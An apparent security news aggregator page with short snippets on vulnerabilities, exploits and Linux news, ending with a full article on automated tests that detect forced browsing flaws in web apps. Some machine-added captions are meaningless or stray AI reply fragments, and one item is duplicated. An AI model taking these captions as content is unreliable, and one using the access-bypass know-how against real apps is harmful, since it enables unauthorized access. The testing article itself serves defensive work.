Summary

Top Articles:

  • A Western Digital Vulnerability is Being Actively Exploited to Wipe Connected Devices
  • 56874 Calls Using a Wardialer on the Finnish Telephone Network
  • Phone screenshots accidentally leaked online by stalkerware-type company
  • Using VBA Macros (from a Word Document) to Exploit Vulnerable Drivers
  • What are computer cookies?
  • All Roads Lead to OpenVPN: Pwning Industrial Remote Access Client
  • Enhancing Automated Configuration Security Capabilities with OpenAI Grant Funding
  • RISC-V Memory Hot Plugging To Be Introduced With Linux 6.11
  • The Next Standard Or The Pursuit Of Phantom Glory
  • New WiFi Authentication Vulnerabilities For Linux's IWD & WPA_Supplicant

Enhancing Automated Configuration Security Capabilities with OpenAI Grant Funding

Published: 2024-07-05 17:02:17

Popularity: None

Author: CoGuard

🤖: "secured config"

Introduction

In an era where software systems are increasingly complex and interconnected, the risks associated with misconfigurations have never been more significant. CoGuard, with the support of OpenAI's Cybersecurity Grant, is pioneering advancements in software configuration security. These developments ensure that our security solution evolves as rapidly as the technologies it aims to protect. 

Automating Security to Mitigate Configuration Risks 

The research funded by the OpenAI Cybersecurity Grant has allowed us to expand and enhance our rule set significantly. The automated creation of configuration security rules not only minimizes human error—a major cause of security breaches—but also ensures that configurations are precise and optimized for security and compliance. This automated approach addresses potential vulnerabilities in the configuration of software applications that have lacked specific security scanning rules, thereby maintaining a proactive defense against evolving threats while supporting the adoption of new technologies by development teams.

Key Advancements in Automation

The grant has enabled an extraction pipeline, automating the derivation of security-relevant configuration parameters and rules from available software documentation and manuals. This ensures a comprehensive analysis and adherence to the latest security standards, significantly reducing human error and effort in rule maintenance.

Expanding and Streamlining Our Security Rule Set 

“By leveraging OpenAI’s capabilities, we’ve automated configuration rules extraction,” noted Albert Heinle, CTO of CoGuard. “This extension has broadened our scanning capabilities to include previously complex software in terms of different configuration parameters or niche software projects.”

The automatic expansion of the configuration rules engine enables CoGuard to scale its protection capabilities alongside client growth and the adoption of emerging technologies without compromising security or performance. This initiative not only enhances security but also boosts operational efficiency by freeing up IT resources for strategic initiatives rather than manual rule management tasks.

Learn More about the Research

For a deeper dive into our research and the specific findings of our latest project, we invite you to read our detailed research report available on GitHub: CoGuard's OpenAI Cybersecurity Grant funded research.

Looking to the Future

 As organizations continue to adopt additional software technologies, the need for adaptable and extensible configuration security measures grows. Our ongoing work with OpenAI to extend and refine our rulesets is just the beginning. We are committed to continuous improvement to ensure our customers' infrastructures remain secure and compliant in an ever-changing technological landscape.

Product Roadmap for Custom Configuration Rules

At CoGuard, we are committed to enhancing our configuration security capabilities to support a wide range of software applications. Our roadmap for the next quarter focuses on expanding our service to include custom configuration rules for the following key software platforms:

As we progress with our roadmap, we invite our customers, stakeholders and those interested in securing software infrastructure to engage with us in the development process. Feedback and insights from actual deployment scenarios are invaluable and help us refine our rules to better meet real-world demands. 

Get Started with CoGuard

Self-Service Scan 

Begin securing your environment immediately by installing our command-line tool. Use the following commands to install CoGuard-cli and start a read-only scan of your AWS/GCP/Azure configurations:

```
pip install coguard-cli
coguard scan aws
```

Assisted Setup 

Prefer a guided setup? Contact us, and our team will work with you to establish the necessary access permissions and discuss the findings from your configuration scan in detail. This personalized approach ensures that you fully understand the applications running on your cloud infrastructure.

Schedule a call with us to explore how CoGuard can help identify vulnerabilities and misconfigurations in your deployed applications.

...more

RISC-V Memory Hot Plugging To Be Introduced With Linux 6.11

Published: 2024-07-01 03:07:24

Popularity: None

Author: Written by

🤖: "Plug in"

The RISC-V kernel port with Linux 6.11 is introducing the ability to handle memory hot plugging/unplugging.

...more

The Next Standard Or The Pursuit Of Phantom Glory

Published: 2024-03-11 12:45:23

Popularity: None

Author: By Paul Nixer

SSH, as Secure Shell Protocol, is the cryptographic network protocol designed to connect machines in a secure manner. Since its introduction in 1995, the protocol has survived many years with many improvements, and in the last decade or more is the industry standard. Yes, here some Windows users will probably

...more

New WiFi Authentication Vulnerabilities For Linux's IWD & WPA_Supplicant

Published: 2024-02-14 03:39:38

Popularity: None

Author: Written by

Kicking off what may end up being a fairly busy Patch Tuesday are two WiFi authentication vulnerabilities being made public that affect Intel's IWD daemon as well as the WPA_Supplicant software -- between the two they are the most common solutions for wireless daemons on Linux systems.

...more

New WiFi Authentication Vulnerabilities For Linux's IWD & WPA_Supplicant

Published: 2024-02-13 18:57:30

Popularity: None

Author: Written by

Kicking off what may end up being a fairly busy Patch Tuesday are two WiFi authentication vulnerabilities being made public that affect Intel's IWD daemon as well as the WPA_Supplicant software -- between the two they are the most common solutions for wireless daemons on Linux systems.

...more

NVIDIA's Open-Source Kernel Driver & Maturing Wayland Support Were Great In 2023

Published: 2024-01-02 21:36:00

Popularity: None

Author: Written by

Following the 2023 highlights for Intel and AMD on Linux, here's a look back at the most popular Linux-related NVIDIA news for the past calendar year.

...more

X.Org Server & XWayland Updated Due To Two Decade-Old Security Vulnerabilities

Published: 2023-12-14 17:22:15

Popularity: None

Author: Written by

The X.Org Server doesn't see much in the way of feature work these days with Red Hat and others divesting from classic X.Org/X11 sessions

...more

Google introduces the almighty blue checkmark in Gmail, and it’s already being exploited

Published: 2023-06-05 11:26:14

Popularity: None

Author: by Robby Payne

Last month, Google introduced a Twitter-style blue checkmark for verified brands in Gmail. This means that anyone with the “Brand Indicators for Message Identification (BIMI) in Gmail” would have the trust of their users who would then know that the sender was, in fact, the real deal instead of an imposter. The almighty blue checkmark...

...more

Using VBA Macros (from a Word Document) to Exploit Vulnerable Drivers

Published: 2022-10-26 14:18:14

Popularity: 39

Author: hoistbypetard@users.lobste.rs (hoistbypetard)

Keywords:

  • security
  • programming

    Comments

    ...more

    Lennart Poettering Talks Up A "Brave New Trusted Boot World" For Linux

    Published: 2022-10-26 01:29:57

    Popularity: None

    Author: Written by

    🤖: "secure boots"

    Systemd lead developer Lennart Poettering has written a lengthy blog post entitled a 'brave new trusted boot world' in which he outlines current issues with the Linux boot process and how there is a trajectory for providing the Linux boot experience with more robustness, simplicity, and trust.

    ...more

    Linux 6.1 Hardening Retpolines With Ensuring An INT3 After Every Unconditional Jump

    Published: 2022-10-06 23:00:57

    Popularity: None

    Author: Written by

    🤖: "`INT3 alert!`"

    The x86/core changes for Linux 6.1 have been merged and are headlined by making sure an INT3 instruction is inserted after every unconditional Retpoline jump (JMP) for the Retpolines handling on both Intel and AMD processors.

    ...more

    All Roads Lead to OpenVPN: Pwning Industrial Remote Access Client

    Published: 2021-11-19 15:51:15

    Popularity: 3

    Author: /u/n0llbyte

    Keywords:

  • r/netsec

    What are computer cookies?

    Published: 2021-09-16 16:08:54

    Popularity: 35

    Author: Malwarebytes Labs

    Keywords:

  • Malwarebytes news
  • computer cookies
  • cookies
  • persistent cookies
  • session cookies
  • super cookies
  • third-party cookies

    What are cookies, are they good or bad, how do they work, and why are some browsers banning third-party cookies?

    ...more

    Phone screenshots accidentally leaked online by stalkerware-type company

    Published: 2021-09-28 12:47:55

    Popularity: 53

    Author: Malwarebytes Labs

    Keywords:

  • Stalkerware
  • Bryan Fleming
  • Jo Coscia
  • Lukas Stefanko
  • pcTattleTale
  • stalkerware
  • unsecure bucket

    Stalkerware-type company pcTattleTale hasn't been very careful about securing the screenshots it sneakily takes from its victims' phones.

    ...more

    56874 Calls Using a Wardialer on the Finnish Telephone Network

    Published: 2021-06-25 14:12:49

    Popularity: 105

    Author: hoistbypetard@users.lobste.rs (hoistbypetard)

    Keywords:

  • security
  • historical

    🤖: "wardialing spree"

    Comments

    ...more

    A Western Digital Vulnerability is Being Actively Exploited to Wipe Connected Devices

    Published: 2021-06-25 14:40:53

    Popularity: 7946

    Author: hoistbypetard@users.lobste.rs (hoistbypetard)

    Keywords:

  • security

    Comments

    ...more

    VoltPillager: Researchers Compromise Intel SGX With Hardware-Based Undervolting Attack - Phoronix

    Published: 2021-02-07 03:38:35

    Popularity: None

    Author: Written by

    🤖: ""Security breach""

    Security researchers out of the University of Birmingham have crafted another attack against Intel Software Guard Extensions (SGX) when having physical motherboard access and using their "VoltPillager" hardware device they assembled for about $30 USD.

    Two years ago, Plundervolt was widely publicized for compromising Intel's SGX security by manipulating the CPU frequency/voltage through software interfaces. By carefully undervolting the Intel CPUs when executing enclave computations, they were able to ultimately compromise the integrity of SGX.



    The impact of Plundervolt was already limited as typically the software needs root/administrative rights to access the CPU voltage/frequency MSRs or other kernel interfaces for manipulating them. But in response to Plundervolt, motherboard vendors began offering options to allow disabling voltage/frequency interface controls on their systems. Following Plundervolt, security researchers at the University of Birmingham in the UK began exploring a hardware-based attack on SGX.

    With the assembled "VoltPillager" device latched onto the motherboard's VR responsible for the CPU voltage, they were able to mount fault-injection attacks to again break the integrity of SGX. With this ~$30 device they were able to run proof-of-concept attacks against crypto algorithms within SGX. Yes, this is a sophisticated attack and not as easy as, say, plugging in a compromised USB/Thunderbolt device, since the VoltPillager needs to be carefully attached to the proper voltage regulator, but researchers have found this method to be successful even with Plundervolt safeguards enabled.

    This VoltPillager device is based on a Teensy microcontroller. The researchers behind this effort are formally presenting their research at the Usenix Security 2021 conference in August, but this weekend at the virtual FOSDEM conference their findings were shared as well. Their pre-publication paper on VoltPillager was published last November and can be found via Usenix.org but at the time didn't receive much attention.

    As for this weekend's FOSDEM Online event, see this slide deck (PDF) for those interested in VoltPillager for their hardware-based under-volting attack on Intel SGX.

    If it's not clear enough already, VoltPillager requires obvious hardware access to the system's motherboard and to carefully attach it to the proper VR for a particular motherboard -- so even while Plundervolt's scope was limited in needing root/admin access to the local system, VoltPillager is much more limited. Per the FOSDEM presentation, Intel responded to the researchers that tampering with the internal hardware to compromise SGX is "out of scope for SGX threat model" and prior Plundervolt mitigations were not designed for hardware-based attacks.

    More of the VoltPillager research can be found on GitHub.

    ...more

    Enter the Vault: Authentication Issues in HashiCorp Vault

    Published: 2020-10-06 18:06:28

    Popularity: None

    Author: Posted by

      Posted by Felix Wilhelm, Project Zero Introduction In this blog post I'll discuss two vulnerabilities in HashiCorp Vault and its integrati...

    ...more

    'Cursed' wallpaper image reportedly crashes Samsung, Google, other phones

    Published: 2020-06-02 03:55:55

    Popularity: None

    Author: Shelby Brown

    🤖: ""Phone crash""

    Using a specific wallpaper image causes some phones to soft-brick.

    ...more

    Linus Torvalds Switches To AMD Ryzen Threadripper After 15 Years Of Intel Systems - Phoronix

    Published: 2020-05-25 04:27:54

    Popularity: None

    Author: Written by

    🤖: "CPU switcheroo"

    An interesting anecdote shared in today's Linux 5.7-rc7 announcement is word that Linux and Git creator Linus Torvalds switched his main rig over to an AMD Ryzen Threadripper.

    At least for what he has said in the past, Linus has long been using Intel boxes given his close relationship with the company (and even close proximity to many of the Intel Portland open-source crew). In fact, he commented this is the first time in about fifteen years not using an Intel system as his primary machine. He made this interesting remark in the RC7 announcement:

    In fact, the biggest excitement this week for me was just that I upgraded my main machine, and for the first time in about 15 years, my desktop isn't Intel-based. No, I didn't switch to ARM yet, but I'm now rocking an AMD Threadripper 3970x. My 'allmodconfig' test builds are now three times faster than they used to be, which doesn't matter so much right now during the calming down period, but I will most definitely notice the upgrade during the next merge window.

    The Threadripper 3970X and the rest of the 3900 series line-up are incredibly great options for kernel developers and those frequently compiling large code-bases. He didn't mention the CPU in his prior Intel box, but he is seeing 3x faster builds.

    With the upcoming Linux 5.8 merge window in early June, his Threadripper system is sure to have a great workout.

    This in turn is actually good news as well for AMD Ryzen Linux users: as Torvalds is constantly building the latest kernel code for mainline, he tends to shout quite publicly and loudly when any code breaks on his systems stemming from botched/poorly-tested pull requests... Thus with the extra and immediate exposure on Threadripper, he will hopefully be spotting any kernel-breaking regressions more quickly and who knows whatever other improvements he may be able to wrangle up as he's burning in his new system.

    ...more

    Microsoft Patch Tuesday — March 2020: Vulnerability disclosures and Snort coverage

    Published: 2020-03-10 20:25:04

    Popularity: None

    Author: Posted by

    🤖: "Patching up"

    A blog from the world class Intelligence Group, Talos, Cisco's Intelligence Group

    ...more

    Goodbye, Flash

    Published: 2019-10-30 14:30:34

    Popularity: None

    Author: Posted by Dong-Hwi Lee, engineering manager, Google

    🤖: "End of an era"

    Official news on crawling and indexing sites for the Google index

    ...more

    A very deep dive into iOS Exploit chains found in the wild

    Published: 2019-08-30 04:20:46

    Popularity: None

    Author: Posted by

    🤖: "iOS Crash"

    Posted by Ian Beer, Project Zero Project Zero’s mission is to make 0-day hard. We often work with other companies to find and report se...

    ...more

    Show HN: Kvmapp – A New Lightweight VM Manager for Linux

    Published: 2019-06-11 10:38:10

    Popularity: None

    Author: tobbyb

    🤖: ""Virtual chaos""

    Article URL: https://www.flockport.com/guides/simplifying-linux-vms Comments URL: https://news.ycombinator.com/item?id=20154264 Points: 1 # Comments: 0

    ...more

    Advisory: Security Issue with Bluetooth Low Energy (BLE) Titan Security Keys

    Published: 2019-05-15 17:57:21

    Popularity: None

    Author: Posted by Christiaan Brand, Product Manager, Google Cloud

    Posted by Christiaan Brand, Product Manager, Google Cloud We’ve become aware of an issue that affects the Bluetooth Low Energy (BLE) vers...

    ...more

    Programmers solve MIT’s 20-year-old cryptographic puzzle | MIT CSAIL

    Published: 2019-05-01 13:29:20

    Popularity: None

    Author: Written By

    🤖: "cryptcracked"

    This week MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL) announced that a 20-year-old cryptographic puzzle was just solved by a self-taught programmer from Belgium, 15 years earlier than MIT scientists expected.

    Bernard Fabrot spent the last three and a half years computing the solution to a puzzle first announced by MIT researchers in 1999. Separately, another team led by tech executive Simon Peffers is nearing completion of computing a solution.

    The puzzle essentially involves doing roughly 80 trillion successive squarings of a starting number, and was specifically designed to foil anyone trying to solve it more quickly by using parallel computing.

    Fabrot and Peffers took very different approaches to the puzzle. Fabrot used a simple Intel Core i7-6700 found in consumer PCs, and computed the solution using the GNU Multiple Precision Arithmetic Library (GMP). Meanwhile, Peffers' team used a novel squaring algorithm (designed by Erdinç Öztürk from Sabanci University) to run on a programmable hardware accelerator called an FPGA. The team, which is working as part of a collaboration called Cryptophage, is on track to finish the puzzle on May 11 after only two months of computation.

    “There have been hardware and software advances beyond what I predicted in 1999,” says MIT professor Ron Rivest, who first announced the puzzle in April 1999 tied to a celebration of 35 years of research at MIT’s Laboratory for Computer Science (now CSAIL). “The puzzle’s fundamental challenge of doing roughly 80 trillion squarings remains unbroken, but the resources required to do a single squaring have been reduced by much more than I predicted.”

    The puzzle is an example of a “verifiable delay function” (VDF), meaning that its answer can only be solved after a certain number of steps. Because VDFs can also be used to create unbiased randomness, they’ve been proposed as potential approaches to improve the security and scalability of blockchain systems like Ethereum and Filecoin. 

    In the original announcement, LCS promised that, if a correct solution was uncovered, they would open a special “time capsule” designed by architect Frank Gehry and filled with historical artifacts from the likes of Web inventor Tim Berners-Lee, Ethernet co-inventor Bob Metcalfe, and Microsoft founder Bill Gates. (Gates donated the original Altair BASIC that represented Microsoft’s first-ever product, which they developed for MITS in 1975.)

    The capsule ceremony will happen Wednesday, May 15 at 4 p.m. at MIT’s Stata Center.

    ...more

    v1.6.04

    Published: 2019-03-08 00:53:52

    Popularity: None

    Author: Posted by

    🤖: "Version fail"

    This release fixes a number of minor bugs in the JavaScript code analysis engine. These bugs resulted in false negatives or performance prob...

    ...more

    Public release of the OWASP TESTING GUIDE v4

    Published: 2019-03-08 00:53:13

    Popularity: None

    Author: Posted by

    17th September, 2014: OWASP is announcing the new OWASP Testing Guide v4.     The OWASP Testing Guide includes a "best practice" ...

    ...more

    The poisoned NUL byte, 2014 edition

    Published: 2019-03-08 00:53:00

    Popularity: None

    Author: Posted by

    🤖: "null pointer"

    Posted by Chris Evans, Exploit Writer Underling to Tavis Ormandy Back in this 1998 post to the Bugtraq mailing list , Olaf Kirch outline...

    ...more

    Rogue Android Apps Hosting Web Site Exposes Malicious Infrastructure

    Published: 2019-03-08 00:49:45

    Popularity: None

    Author: Posted by

    🤖: ""Bad App Alert""

    With cybercriminals continuing to populate the cybercrime ecosystem with automatically generated and monetized mobile malware variants, w...

    ...more

    How I created two images with the same MD5 hash

    Published: 2019-03-08 00:49:11

    Popularity: None

    Author: Posted by

    🤖: "Hash collision"

    I posted the following images the other day which although looking totally different have exactly the same MD5 hash ( e06723d4961a0a3f950e...

    ...more

    Android Malware Analysis Distros

    Published: 2019-03-08 00:46:02

    Popularity: None

    Author: Posted by

    🤖: "malware alert"

    A bit of everything around Android Malware & Security. Always sanitizing malware with some fresh "lemon" juice.

    ...more

    Inside SimpLocker

    Published: 2019-03-08 00:45:56

    Popularity: None

    Author: Posted by

    🤖: "malware alert"

    A bit of everything around Android Malware & Security. Always sanitizing malware with some fresh "lemon" juice.

    ...more

    Building a deeper understanding of images

    Published: 2019-03-08 00:44:01

    Popularity: None

    Author: Posted by Christian Szegedy, Software Engineer

    🤖: "Image insight"

    Posted by Christian Szegedy, Software Engineer The ImageNet large-scale visual recognition challenge ( ILSVRC ) is the largest academic chal...

    ...more

    An introduction to gikdbg.art (aka Android Ollydbg) attaching Towelroot

    Published: 2019-03-08 00:40:54

    Popularity: None

    Author: Posted by

    🤖: "I'm not going to make it easy for you. Here's a response: Towel root failure"

    A bit of everything around Android Malware & Security. Always sanitizing malware with some fresh "lemon" juice.

    ...more

    Dex to Java decompiler (jadx)

    Published: 2019-03-08 00:40:52

    Popularity: None

    Author: Posted by

    🤖: "Reverse engineering"

    A bit of everything around Android Malware & Security. Always sanitizing malware with some fresh "lemon" juice.

    ...more

    trusted bootloader RCE trickery

    Published: 2019-03-08 00:35:28

    Popularity: None

    Author: Posted by

    🤖: ""Booty call fails""

    So you are safe, because you updated your bash, run your policy in enforcing  mode, enabled NX and ASLR and boot using a cryptographically...

    ...more

    (DNA Top 10 in 2014) Censorship 2.0: Shadowy forces controlling online conversations

    Published: 2019-03-08 00:29:29

    Popularity: None

    Author: By A. Asohan April 30, 2015

    🤖: "CENSORED"

    At the HITBSecConf event in Kuala Lumpur last month, a team from South Africa demonstrated how unknown forces are manipulating hearts and minds on the Internet by controlling the online narrative, writes A. Asohan.

    ...more

    Chinese Counterintelligence Doesn't Fool Around

    Published: 2019-03-08 00:28:20

    Popularity: None

    Author: Posted by

    🤖: "Spies getting taken down"

    Screen capture from 2 Jan 2015 SCMP This is an amazing story in the South China Morning Post . Typist sentenced to death in China for ...

    ...more

    DIA Cyber Warrior delivers first Worldwide Threat Assessment

    Published: 2019-03-08 00:26:23

    Popularity: None

    Author: Posted by

    🤖: "Cyber warning siren"

    A blog about computer crime, digital evidence, and the cases and criminals related to those crimes. Malware, botnets, spam, and phishing.

    ...more

    Android is ready for work

    Published: 2019-03-08 00:25:17

    Popularity: None

    Author: Posted by Rajen Sheth, Director of Product Management, Android and Chrome for Work

    🤖: "Mobile office party"

    Posted by Rajen Sheth, Director of Product Management, Android and Chrome for Work (Cross-posted on the Android Blog .) Over a billi...

    ...more

    Exploiting the DRAM rowhammer bug to gain kernel privileges

    Published: 2019-03-08 00:24:33

    Popularity: None

    Author: Posted by

    🤖: "Rowhammer chaos"

    Rowhammer blog post (draft) Posted by Mark Seaborn, sandbox builder and breaker, with contributions by Thomas Dullien, reverse en...

    ...more

    Tracking Protection for Firefox at Web 2.0 Security and Privacy 2015

    Published: 2019-03-08 00:20:40

    Popularity: None

    Author: Posted by

    🤖: "Trackers blocked"

    Edited to add: I wrote a followup post to address comments here and elsewhere that advertising is working as intended. This paper has been ...

    ...more

    The Blue Team Myth

    Published: 2019-03-08 00:17:11

    Popularity: None

    Author: Posted by

    🤖: "Cyber battle prep"

    The 2015 M-Trends Report  states that the median number of days that threat groups were present in a victim's network before detection was 2...

    ...more

    How we cracked millions of Ashley Madison bcrypt hashes efficiently

    Published: 2019-03-08 00:12:51

    Popularity: None

    Author: Posted by

    🤖: "Cracked and burned"

    Not long after the release of the Ashley Madison leaks, many groups and individuals attempted to crack the bcrypt hashes. Since t...

    ...more

    Improved Digital Certificate Security

    Published: 2019-03-08 00:10:31

    Popularity: None

    Author: Posted by Stephan Somogyi, Security & Privacy PM, and Adam Eijdenberg, Certificate Transparency PM

    🤖: "Locked and loaded!"

    Posted by Stephan Somogyi, Security & Privacy PM, and Adam Eijdenberg, Certificate Transparency PM On September 14, around 19:20 GMT, Syma...

    ...more

    Windows Drivers are True’ly Tricky

    Published: 2019-03-08 00:08:49

    Popularity: None

    Author: Posted by

    🤖: "Windows crash"

    Posted by James Forshaw, Driving for Bugs Auditing a product for security vulnerabilities can be a difficult challenge, and there’s no ...

    ...more

    Hack The Galaxy: Hunting Bugs in the Samsung Galaxy S6 Edge

    Published: 2019-03-08 00:06:49

    Popularity: None

    Author: Posted by

    🤖: "space bugs"

    Posted by Natalie Silvanovich, Planner of Bug Bashes Recently, Project Zero researched a popular Android phone, the Samsung Galaxy S6 E...

    ...more

    ARRIS Cable Modem has a Backdoor in the Backdoor

    Published: 2019-03-08 00:05:57

    Popularity: None

    Author: Posted by

    🤖: "Backdoor activated"

    A couple of months ago, some friends invited me to give a talk at NullByte Security Conference . I started to study about some embedded devi...

    ...more

    Between a Rock and a Hard Link

    Published: 2019-03-08 00:04:03

    Popularity: None

    Author: Posted by

    🤖: "Linking problems"

    Posted by James Forshaw, File System Enthusiast In a previous blog post I described some of the changes that Microsoft has made to the ...

    ...more

    Speak About Your Cyberwar at PHDays VI

    Published: 2019-03-08 00:02:38

    Popularity: None

    Author: Posted by

    🤖: ""cyber warfare""

    Positive Hack Days VI, the international forum on practical information security, opens Call for Papers on December 3, 2015. Our internati...

    ...more

    Breaking and evading Linux with a new novel technique |SentinelOne.com

    Published: 2019-03-08 00:02:31

    Popularity: None

    Author: By SentinelOne Labs -

    🤖: ""Evade me!""

    The focus of any malware research is on anticipating where an attack may go, or where it’s already been in order to develop and implement new prevention techniques.

    ...more

    FireEye Exploitation: Project Zero’s Vulnerability of the Beast

    Published: 2019-03-08 00:02:24

    Popularity: None

    Author: Posted by

    Posted by Tavis Ormandy, Chief Silver Bullet Skeptic. FireEye sell security appliances to enterprise and government customers. FireEye...

    ...more

    Effective Fully Automated Forced Browsing Testing

    Published: 2019-03-08 00:02:04

    Popularity: None

    Author: written by

    Forced browsing is the class of serious web application vulnerability I see the most often. Contrary to conventional wisdom, you can build effective automated tests for it in your application, tests that don’t use hard-coding or fuzzing.

    This friend of mine, Ohran, maintains a decent-sized web app, mydeathstar.empire. It does various boring administrative things for this space station, and the guy in charge, Darth something, keeps him busy with lots of little tweaks. The latest one was that for some reason he wanted to restrict who was allowed to remotely operate the trash compactors. Apparently there’d been some issue with that. So my friend wrote some code for the web app’s navigation header so that you’d only see a link to the trash compactor dashboard if you had the right set of privileges. It looked something like

    in render_nav_bar:

    ```
    if (current_user.trash_master) {
      link_to("/trash_compactor_dashboard")
    }
    ```

    So Trash Masters saw a page like this:

    While regular stormtroopers saw a page without the link:

    Now, Ohran is very conscientious about quality (apparently Darth Whatever isn’t very forgiving of bugs) so he added in a couple of automated tests too:

    ```
    login_as(regular_user)
    visit_page("/")
    assert_not_in_page("/trash_compactor_dashboard")

    login_as(trashy_user)
    visit_page("/")
    assert_in_page("/trash_compactor_dashboard")
    ```

    And of course he deployed it to a staging server and had someone click around to make sure everything looked right. Eventually, he pushed the changes to the live server, and all seemed well.

    That night, though, he woke up in a sudden panic. He pulled his laptop onto his chest and logged in to his account. The link wasn’t there, as expected – trash wasn’t his job. Then, he manually typed a URL into his address bar, hit enter, and…

    Ohran had forgotten some very important code. When a request came in to load the dashboard page, or perform any trash compactor action, he needed to check to ensure that request was actually authorized. Even though no unauthorized user could get to the dashboard by accident, anybody with an account could use the forced browsing technique to load the page–and since it had previously been accessible to everyone, people certainly knew the URL. Ohran had to scramble to fix his mistake before anyone noticed.

    After saving his neck, Ohran came to me, still fretting. “The authorization logic in this app is all over the place,” he said. “I don’t have the time or the freedom to refactor it, so whenever I add a new authorization rule, I just have to remember to add it in at least two places: hiding the link, and controlling the actual functionality. If I forget the first one, the user sees an error, and if I forget the second one, I’ve made the app vulnerable. For all I know, there’s some other forced browsing vulnerability out there that I’ve missed. Like when stormtrooper TK-422 goes to his personal preferences page, the URL looks like /users/TK-422/preferences. If he changed the number in the URL so it was /users/TK-421/preferences, he shouldn’t see TK-421’s preference page, that’s private!” Ohran rubbed his throat.

    “Can’t you write a test for forced browsing?” I asked.

    “I Googled it, and apparently you can’t really,” said Ohran. “Like, OWASP says ‘Automated tools are unlikely to find these problems.’ They give a lot of ways to defend against it, but they’re all manual testing and refactoring and doing code analysis. Which, I mean, I’ll do as much as I can. Everywhere else I’ve looked says it’s impossible, aside from just checking a hardcoded list of common ‘sensitive paths’ like /admin.php. There’s no way /trash_compactor_dashboard is gonna be on that list. Or there’s fuzzing, but same deal there–no testing tool is going to randomly guess that URL.”

    Ohran and I put our heads together, and eventually we figured out a solution. It was actually pretty obvious in retrospect: just take what a manual white-hat tester does when searching for forced browsing vulnerabilities, and do it programmatically. First, we wrote a helper function in Ohran’s test code that could crawl the site, recursively following all of the links that a given user could see and returning the complete list. It looked something like

    define browse_as(user) {
      visited_pages = Set.new()
      crawl(user, "/", visited_pages)
      return(visited_pages)
    }

    define crawl(user, page, visited_pages) {
      login_as(user)
      visit_page(page)
      visited_pages.add(page)
      current_page.links.for_each(link) {
        if(!visited_pages.include(link)) { crawl(user, link, visited_pages) }
      }
    }

    Just your standard spider. We made it re-login on every request just because some links log you out, but we could also have blacklisted logout links and other links that leave the site, so that we don’t end up crawling around the actual web.

    Then we checked in a test. In the test, we create two users. One has all the privileges in the app: she could operate the trash compactors, commence primary ignition, open the thermal exhaust port, whatever. The other just has the minimum privileges necessary to log in. Then, the test crawls as both users, and compares the results. Crawling as the privileged user is just a simple way of enumerating all the pages in the app. Crawling as the unprivileged user is a way of inferring what the user is expected to be able to see. We can assume that if a user sees a link to a page they’re not supposed to see, that’ll be caught in manual testing. So this automated test now knows that any user can see the home page, their preference page, and a station-wide list of alerts, say. Now we take the difference of the lists: the list of all pages the privileged user can browse to, but the unprivileged user can’t. This will include admin-only pages, like the trash compactor dashboard, as well as personal pages for the privileged user, like her preferences page. Finally, we can loop over each link in this list, and try forced browsing to it as the unprivileged user. If we get a success response, not a redirect or an error, then this is likely a forced browsing vulnerability, and the test should fail. The test looks like:

    privileged_user_visible_pages = browse_as(privileged_user)
    regular_user_visible_pages = browse_as(unprivileged_user)
    restricted_pages = privileged_user_visible_pages.except(regular_user_visible_pages)
    restricted_pages.for_each(link) {
      login_as(unprivileged_user)
      visit_page(link)
      assert_error_page(current_page)
    }

    Happily, it turns out the conventional wisdom is wrong. As long as you have the ability to log in as both a privileged and unprivileged user, you can write an automated test for your web app that catches forced browsing vulnerabilities. I believe this should be added to integration testing for most web applications. If you use an interactive testing tool like Burp Suite, I’d suggest implementing this as a plugin (I might even write this as a bookmarklet one of these days). If you use, say, Cucumber, it’s probably fastest to just implement this algorithm by hand in your existing test suite.
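
    The crawl-and-diff test described above, as a runnable sketch that is an added example and not the author's code. ToyApp, User and the function names are hypothetical stand-ins for a real app and test client; the toy app hides the dashboard link but, unless enforce_dashboard_check is set, forgets the server-side check, as in the story.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    privileges: frozenset = frozenset()


class ToyApp:
    """Constructed in-memory stand-in for the web app (hypothetical)."""

    def __init__(self, enforce_dashboard_check):
        self.enforce_dashboard_check = enforce_dashboard_check

    def get(self, user, path):
        """Handle a GET as `user`; return (status, links rendered on the page)."""
        nav = ["/", "/alerts", f"/users/{user.name}/preferences", "/logout"]
        if "trash_master" in user.privileges:
            # Link hiding only: this is presentation, not authorization.
            nav.append("/trash_compactor_dashboard")
        if path in ("/", "/alerts"):
            return 200, nav
        if path.startswith("/users/") and path.endswith("/preferences"):
            owner = path.split("/")[2]
            return (200, nav) if owner == user.name else (403, [])
        if path == "/trash_compactor_dashboard":
            if self.enforce_dashboard_check and "trash_master" not in user.privileges:
                return 403, []
            return 200, nav  # missing check: any logged-in user gets the page
        if path == "/logout":
            return 302, []
        return 404, []


def browse_as(app, user, start="/", skip=frozenset({"/logout"})):
    """Follow every link `user` is shown; return the set of pages that loaded."""
    seen, loaded, todo = set(), set(), [start]
    while todo:
        path = todo.pop()
        if path in seen or path in skip:
            continue
        seen.add(path)
        status, links = app.get(user, path)
        if status == 200:
            loaded.add(path)
            todo.extend(links)
    return loaded


def restricted_pages(app, privileged, unprivileged):
    """Pages the privileged user can reach by links but the other user cannot."""
    return browse_as(app, privileged) - browse_as(app, unprivileged)


def find_forced_browsing(app, privileged, unprivileged):
    """Request each restricted page directly as the unprivileged user.

    Any 200 response is a page that is hidden but not protected.
    """
    return sorted(
        path
        for path in restricted_pages(app, privileged, unprivileged)
        if app.get(unprivileged, path)[0] == 200
    )


ADMIN = User("admin", frozenset({"trash_master"}))
TROOPER = User("TK-422")

if __name__ == "__main__":
    for enforce in (False, True):
        findings = find_forced_browsing(ToyApp(enforce), ADMIN, TROOPER)
        print(f"server-side check={enforce}: unprotected pages = {findings}")
```

    In a real suite, ToyApp.get would be replaced by the test framework's HTTP client and the final comparison by an assertion that the list of findings is empty.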

    Gotchas:

    • Make sure you secure your write (e.g. POST, PUT) routes, not just your page reads. My pseudo-code above works for this if “current_page.links” includes form submissions and AJAX requests, and “visit_page()” can handle form submissions, but that’s tricky since you may need mock data.
    • As mentioned, it’s best to restrict the links you follow to relative links and ones to the same domain, and to blacklist the logout link.
    • For a large enough app, this can be a time-consuming test. Ideally, try to run it outside of a browser to save time rendering. You may also want to optimize by adding “redundant” pages to your blacklist, such as pages after the first of a paginated result list.
    • Make sure you’re running against a test database that has at least one of everything, so that every possible link exists.
    • If you try to browse to a page you don’t have access to, some apps will simply serve a page you do have access to instead, without returning a 3xx Redirect response or displaying an error. These can lead to spurious failures in your tests. Ideally you should change that behavior, as it’s not very standards-compliant anyway.
